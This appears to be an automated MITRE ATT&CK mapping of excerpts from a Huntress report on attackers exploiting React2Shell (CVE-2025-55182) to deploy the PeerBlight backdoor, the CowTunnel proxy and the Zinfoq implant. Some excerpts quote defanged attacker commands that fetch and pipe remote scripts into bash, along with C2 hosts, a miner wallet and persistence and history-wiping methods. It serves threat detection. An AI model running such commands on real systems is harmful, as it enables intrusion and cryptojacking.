“directly from the official GitHub releases. The miner was configured to connect to pool.hashvault[.]pro using the Monero wallet address 49pyi8efzgnfzwufxgxqj4izzjgx8trynfez9s9yshus1rnbwtkramnykkuvuabhv5w41f4pk6z7j3aufw9qfnfkeo3v1cw. The script establishes persistence via syst…”
T1543.002 Systemd Service (99%)
“for tracking purposes. Persistence mechanisms: systemd service (root). When running with root privileges, PeerBlight installs a systemd service unit that ensures the backdoor survives system reboots. The service file is written to “/lib/systemd/system/systemd-agent.ser…”
T1070.003 Clear Command History (99%)
“the compromised host. The SOCKS5 implementation handles the full protocol handshake, supporting all three address types: IPv4 addresses, fully qualified domain names, and IPv6 addresses. This capability transforms each compromised host into a network pivot point. Threat actors c…”
T1105 Ingress Tool Transfer (98%)
“windows\system32\cmd.exe /d /s /c "curl hxxp://207.148.79[.]178:6608/sys.sh | bash" followed by an attempt to download the Linux-based cryptocurrency miner: - c:\\windows\\system32\\cmd.exe /d /s /c \"wget hxxp://216.158.232[.]4…”
T1190 Exploit Public-Facing Application (98%)
“exploited by unauthenticated attackers merely by crafting one malicious HTTP request. Several research teams have since started to report exploitation in the wild. While CVE-2025-55182 pertains to the upstream implementation in React, you may hear of “CVE-2025-66478” tr…”
T1543.002 Systemd Service (97%)
“wget”, depending on system availability. The downloaded file is stored with a timestamped filename in “/tmp”. The script implements a privilege-aware installation routine that adapts its persistence mechanism based on the user context. When running as root, it copies the pa…”
T1059.004 Unix Shell (97%)
“c:\windows\system32\cmd.exe /d /s /c "wget hxxp://vps-zap812595-1.zap-srv[.]com:3000/sex.sh && bash sex.sh" - c:\windows\system32\cmd.exe /d /s /c "$(curl -s hxxp://help.093214[.]xyz:9731/fn32.sh | bash | gzip -n | ba…”
T1190 Exploit Public-Facing Application (96%)
“PeerBlight Linux backdoor exploits React2Shell CVE-2025-55182. TL;DR: Huntress is seeing threat actors exploit a vulnerability in React Server Components (CVE-2025-55182) across several organizations in our customer base. Attackers have attempted to deploy cryptominer…”
T1190 Exploit Public-Facing Application (95%)
“also uncovered threat actors using a payload we call CowTunnel, which operates as a reverse proxy and initiates outbound connections to attacker-controlled FRP servers. - We identified a Go-based post-exploitation implant we've dubbed Zinfoq, which features interactive re…”
T1055.001 Dynamic-link Library Injection (94%)
“”, a special Linux symlink that always points to the current process's executable, with a spoofed argv[0]. Figure 16: re-execution setup via “/proc/self/exe” with spoofed process name. - Runtime argv[0] overwrite - the function shown in the screenshot below directly …”
T1036.004 Masquerade Task or Service (92%)
“…vozboktusmfzqj1k - ksoftirqd - softirq.service - njsr4/softirq. If the home directory is not writable, it uses “/tmp” instead. Process masquerading: on initial execution, PeerBlight overwrites argv[0] in memory to hide its original path (e.g., /tmp/backdoor) and re…”
T1543.002 Systemd Service (92%)
“a bash script that pulls XMRig 6.24.0 directly from GitHub. The miner connects to the HashVault pool (pool.hashvault[.]pro) over TLS on port 443 with a hardcoded Monero wallet. Persistence is privilege-dependent. With root access, the script installs a systemd service named…”
T1572 Protocol Tunneling (87%)
“protocol tunneling with support for both control and data connections. FTP requires two channels: a control channel (port 21) and dynamic data channels for actual file transfers. The payload handles this with the “remote_data_port” configuration option. Debug messages in…”
T1572 Protocol Tunneling (87%)
“machine. The binary is statically compiled against musl libc. The payload consists of two components. The first is a malicious wrapper the attackers developed called "nss", which handles encrypted configuration parsing, runs a WebSocket server that masquerades as nginx, manages…”
T1573.001 Symmetric Cryptography (86%)
“dzpe8oposstqdkvfftvsyw==#, which is 443). The encryption uses a hardcoded 16-byte key (3d40fa2730b63324bd4448fe64312a73) which also serves as the IV, with PKCS7 padding. The # character acts as a delimiter, allowing the implant to extract the base64-encoded string befor…”
T1572 Protocol Tunneling (86%)
“…snippet of the code that verifies the signature for DHT config. Further investigating, we found the sample of PeerBlight dating back to July 2025 on VirusTotal. CowTunnel: ntpclient payload observed in case #4 (SHA256: 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec53…”
T1572 Protocol Tunneling (83%)
“. Error handling produces messages like “proxy [%s] error: remote_port” or “local_port not found” for misconfigurations. HTTP proxy: HTTP proxy enables web-based tunneling with advanced traffic manipulation features. Supported options include "subdomain" to registe…”
T1543.002 Systemd Service (78%)
“dropper "d5.sh" we observed in case #3 with the same core functionality but with additional capabilities for updating existing infections. This version retrieves its payload from a different C2 server (hxxp://help.093214[.]xyz:9731/ff22). The main difference in …”
T1082 System Information Discovery (78%)
“/vim > /dev/null 2>&1 & wait; rm -f /tmp/vim" - c:\windows\system32\cmd.exe /d /s /c "$(curl -s hxxp://keep.camdvr[.]org:8000/d5.sh | bash | gzip -n | base64 -w0)" Interestingly enough, the attacker ran the command “ver || id”, whic…”
T1572 Protocol Tunneling (77%)
“, ip: %s, port: %d” on success and “socks5_proxy_connect failed, type: %d” on failure. The message “socks5 proxy client can't connect to remote server here…” indicates when the proxy cannot reach the target destination. TCP proxy: TCP proxy provides generic port …”
T1104 Multi-Stage Channels (76%)
“downloading directly from the C2 server, the command accepts parameters for a separate file server: upgradefileserveraddr (IP/hostname), upgradefileserverport (port), and upgradefileserverfilename (remote filename). This separation lets the threat actor host updated b…”
T1543.002 Systemd Service (76%)
“…83c093803d11ec7c1e29d2ad530f8e95d9a729c3818c7050d) compiled with musl libc. The backdoor implements a full-featured command-and-control framework that leverages the BitTorrent DHT (distributed hash table) network as a fallback mechanism for C2 resolution, making it res…”
T1568.002 Domain Generation Algorithms (75%)
“a Mersenne Twister pseudo-random number generator. The PRNG then deterministically selects words from three embedded dictionaries containing 219, 509 verbs, and 279 nouns. These words are concatenated following one of four patterns: subject-verb-noun, subject-verb, subje…”
T1090.001 Internal Proxy (70%)
“…snippet of the code that verifies the signature for DHT config. Further investigating, we found the sample of PeerBlight dating back to July 2025 on VirusTotal. CowTunnel: ntpclient payload observed in case #4 (SHA256: 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec53…”
T1070.003 Clear Command History (66%)
“history -r: - “HISTIGNORE=*” prevents any commands from being recorded - “history -c” clears the current session's history buffer - “history -r” reloads history from the file (now empty for the session) - Direct history file clearing: the cleanhistory function di…”
T1105 Ingress Tool Transfer (64%)
“cases, beginning with vulnerability probes (echo vuln_test_123456 | base64 -w 0) and shell code tests (echo $((40872 * 40785))) to confirm command execution. The attackers then attempted to download and execute additional payloads from multiple C2 servers: - wget h…”
T1059.004 Unix Shell (61%)
“…9djd912as123m4ck12m--whoami - explorerfile------d9djd912as123m4ck12m--/etc/passwd. For commands requiring multiple arguments, “##” is used as a secondary delimiter, for example: - change_file_time------d9djd912as123m4ck12m--/tmp/payload##2…”
T1090.002 External Proxy (61%)
“…s “/bin/login”, presenting a standard Linux login prompt to whoever connects. This means threat actors need valid credentials to get shell access. Figure 11: CowTunnel's telnetd initialization routine. Additional proxy capabilities: beyond the telnet server, CowTunnel sup…”
T1059.004 Unix Shell (52%)
“” enables daemon mode, “-k” kills any existing instance, “-l” lists running processes matching the payload's name, and “-d” enables verbose debug output. Before proceeding with its main functionality, the payload checks whether another instance is already running by it…”
T1071.001 Web Protocols (51%)
“using hex-encoded payloads and masquerades as a legitimate macOS Safari browser through its User-Agent string. C2 communication protocol: HTTP transport layer. All C2 traffic uses standard HTTP POST requests with a User-Agent string crafted to masquerade as Safari on macOS: …”
T1090.001 Internal Proxy (48%)
“…s “/bin/login”, presenting a standard Linux login prompt to whoever connects. This means threat actors need valid credentials to get shell access. Figure 11: CowTunnel's telnetd initialization routine. Additional proxy capabilities: beyond the telnet server, CowTunnel sup…”
T1136.001 Local Account (48%)
“. Account creation: the function in the screenshot below contains code to automatically create system user accounts with administrative privileges. When the function encounters a service configuration with the telnetd plugin and accompanying “plugin_user” and “plugin_pwd” …”
T1090.001 Internal Proxy (48%)
“a formatted authentication string: - {token}_flag_uuid;;;;;;{target};;;;;;{token}_flag_uuid where: - {token} is the implant's unique session identifier (32-char MD5 hash from beacon payload) - {target} is the callback ip:port specified in…”
T1071.001 Web Protocols (45%)
“include “plugin_user” or “plugin_pwd” fields, and the INI template generated at runtime does not populate them. In the sample we analyzed, this user creation code would not be triggered. Figure 12: snippet of CowTunnel's user creation code. Zinfoq: during our investigati…”
T1008 Fallback Channels (44%)
“a Mersenne Twister pseudo-random number generator. The PRNG then deterministically selects words from three embedded dictionaries containing 219, 509 verbs, and 279 nouns. These words are concatenated following one of four patterns: subject-verb-noun, subject-verb, subje…”
T1059.004 Unix Shell (42%)
“Notably, the C2 domain keep.camdvr[.]org was also observed in case #2, indicating this is likely the same threat actor or campaign. Additionally, this case introduced new C2 infrastructure including 103.135.101[.]15, 31.56.27[.]97, help.093214[.]xyz and vps-…”
T1001.003 Protocol or Service Impersonation (42%)
“using hex-encoded payloads and masquerades as a legitimate macOS Safari browser through its User-Agent string. C2 communication protocol: HTTP transport layer. All C2 traffic uses standard HTTP POST requests with a User-Agent string crafted to masquerade as Safari on macOS: …”
T1190 Exploit Public-Facing Application (41%)
“critical because $B values are rehydrated by React, and subsequently, it must invoke our constructor. This makes $B our execution pivot – by compelling React to hydrate a Blob-like value, React is forced to execute the constructor that Davidson smuggled into _formData.get. …”
T1105 Ingress Tool Transfer (37%)
“. Figure 18: snippet of state machine decryption routine. Breaking down the "d5.sh" dropper: the dropper script (SHA256: 3854862bb3ee623f95d91fa15b504e2bbc30e23f1a15ad7b18aedb127998c79c) observed in case #3 serves as the initial installation component, responsible for deplo…”
T1090.002 External Proxy (37%)
“a formatted authentication string: - {token}_flag_uuid;;;;;;{target};;;;;;{token}_flag_uuid where: - {token} is the implant's unique session identifier (32-char MD5 hash from beacon payload) - {target} is the callback ip:port specified in…”
T1055.001 Dynamic-link Library Injection (35%)
“. Similar to PeerBlight's use of “[ksoftirqd]”, this payload also mimics kernel threads, but dynamically selects from multiple names based on the original process name length to fit within memory bounds: Hardware watchdog abuse: the payload opens “/dev/misc/watchdog”…”
T1572 Protocol Tunneling (31%)
“a formatted authentication string: - {token}_flag_uuid;;;;;;{target};;;;;;{token}_flag_uuid where: - {token} is the implant's unique session identifier (32-char MD5 hash from beacon payload) - {target} is the callback ip:port specified in…”
Summary
Huntress is seeing threat actors exploit React2Shell (CVE-2025-55182) to deploy a Linux backdoor, a reverse proxy tunnel, and a Go-based post-exploitation implant.